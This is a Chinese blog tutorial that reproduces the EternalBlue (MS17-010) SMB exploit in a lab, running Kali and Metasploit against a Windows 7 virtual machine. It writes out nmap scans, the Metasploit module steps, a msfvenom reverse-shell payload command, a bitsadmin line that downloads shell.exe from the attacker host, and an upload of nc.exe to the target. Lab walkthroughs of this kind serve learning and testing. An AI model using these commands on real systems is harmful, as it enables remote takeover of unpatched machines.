当前位置:   article > 正文

永恒之蓝漏洞复现(详细版)

永恒之蓝漏洞复现

一、漏洞原理

  1. 永恒之蓝(Eternal Blue)是一种利用Windows系统的SMB协议处理SMB v1请求时发生的漏洞来获取系统的最高权限,以此来达到控制目标计算机的目的。通过永恒之蓝漏洞会扫描445文件共享端口的Windows机器,无需用户任何操作只要开机上网,就能被植入恶意程序。由此不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全球范围内遭受到病毒的攻击。
  2. SMB(Server Message Block)是一个协议服务器信息块,是一种客户机/服务器、请求/相应协议,通过SMB协议可以在计算机间共享文件等资源。SMB协议工作在应用层和会话层,可以用在TCP/IP协议上,使用TCP139和445端口

二、环境配置

1.虚拟机环境

        1)攻击机:kali linux(192.168.154.252)

        镜像文件下载:https://developer.aliyun.com/mirror/

         2) 渗透靶机: Windows 7(192.168.154.140)

2.matesploit框架

        matesploit框架(Matesploit Framework,MSF)是一个开源工具,由Ruby程序语言编写的模块化框架,主要为后端提供用来测试的端口(如控制台、Web、CLI)。常用为控制台接口,通过该接口可以访问matesploit框架的所有插件(如payloads、利用模块、post模块等),还可使用第三方程序的插件(如sqlmap、nmap等)。

1.检查更新:

  • apt update
  • apt install metasploit-framework

  目前最新版本

2.进入攻击框架:msfconsole

三、复现过程

1.信息收集

  • nmap -sT -sC -sV -O 192.168.154.250 -p 0-65535

# -sT:TCP全连接扫描

# -sC:使用内置脚本进行扫描

# -sV:识别服务版本

# -O:识别系统

# -P:指定端口扫描(0-65535为全端口)

 发现445端口是打开的(一般139端口是不开的)

下面是一些脚本漏洞编号

搜索版本漏洞的方法:

1.searchsploit  xxxx(eg:IIS,Apache)

2.进入MSF模块后search

3.上网搜索

2.尝试攻击

  • search ms17-010

发现以下模块:

1:exploits—漏洞利用攻击模块
2:auxiliary—辅助扫描漏洞模块

0-4中如何选择?先选择扫描模块检测漏洞是否存在(2或3)

0:让靶机变蓝屏

1:用于主机横向渗透

4:SMB远程代码执行

3.使用扫描模块

        1)use 2

主要看需要配置的地方(yes)

需要配置的有点多,重新选择一个

        2)扫描:use 3

这下只需配置靶机IP地址、命名的管道、端口、线程数(后三个已经配置好了)

设置靶机IP地址:

运行一下

        3)连接失败问题

这里出现了问题:Host does NOT appear vulnerable

1.检查防火墙是否关闭

2.检查远程连接是否开启

3.卸载更新的补丁至下面三个即可(没安装vmware tools)

        4)重新运行

成功发现可利用漏洞ms17-010,,扫描模块结束,接下尝试进行攻击

4.攻击:use 0

更改靶机地址:

查看反弹shell 的语句:

查看支持攻击的目标:

运行一下,成功拿下靶机

让靶机弹出计算器:

有弹窗出现

查看不同漏洞模块:

尝试运行一个:screenshare—实时监控当前主机界面

5.进行渗透

        1)查看IP

发现出现是乱码

修改编码格式:

接下来看是没有问题的

        2)文件上传

在绝对路径下创建一个文档

将该文件上传到靶机中

查看是否上传成功

发现上传的文档,成功

6.后渗透模块

post模块可以实现提权、扫描探测等等

随便选择一个看一下

其他功能都在MSF中,感兴趣自己可以尝试。

7.上传木马

1.msfvenom

这里用到生成木马工具:msfvenom,然后使用msfconcole进行监听

  • msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.154.252 port=4444 -f exe -o /tmp/shell.exe

# -p payloads,反弹shell的语句

# -f 生成文件的格式

# -o 生成文件的路径

进入/tmp目录下看到生成的文件

反弹shell

(1)开启一个web服务

(2)使用工具生成反弹shell语句,在靶机看能否下载成功

bitsadmin /rawreturn /transfer getfile "http://192.168.154.252:9999/shell.exe" C:\\shell.exe

这里出现问题了,我搜索了一圈也没找到解决办法,只能换一种工具

2.nc(NetCat)

MSF上传nc到靶机的c盘下

upload /usr/share/windows-binaries/nc.exe  C:\\Windows

在靶机上看一下文件成功上传,这样就可以使用nc连接靶机

声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号